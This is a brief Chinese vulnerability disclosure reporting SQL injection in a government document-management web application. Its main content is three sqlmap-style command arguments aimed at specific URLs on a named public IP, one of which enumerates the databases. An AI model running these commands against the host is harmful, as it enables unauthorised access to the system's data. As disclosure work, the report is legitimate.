### 简要描述:
sql注入
### 详细说明:
注入1: -u "http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?editId=2&action=listLoad" --dbms="Microsoft SQL Servcer" --dbs
注入2: -u "http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?id=2&action=modify"
注入3: -u "http://119.254.81.197:7001/defaultroot/GovSendFileAction.do?id=2&action=delete"
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201409/171534488fdb41a52151333c36c777ee4a4b164d.jpg" alt="11.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/171534488fdb41a52151333c36c777ee4a4b164d.jpg)
暂无评论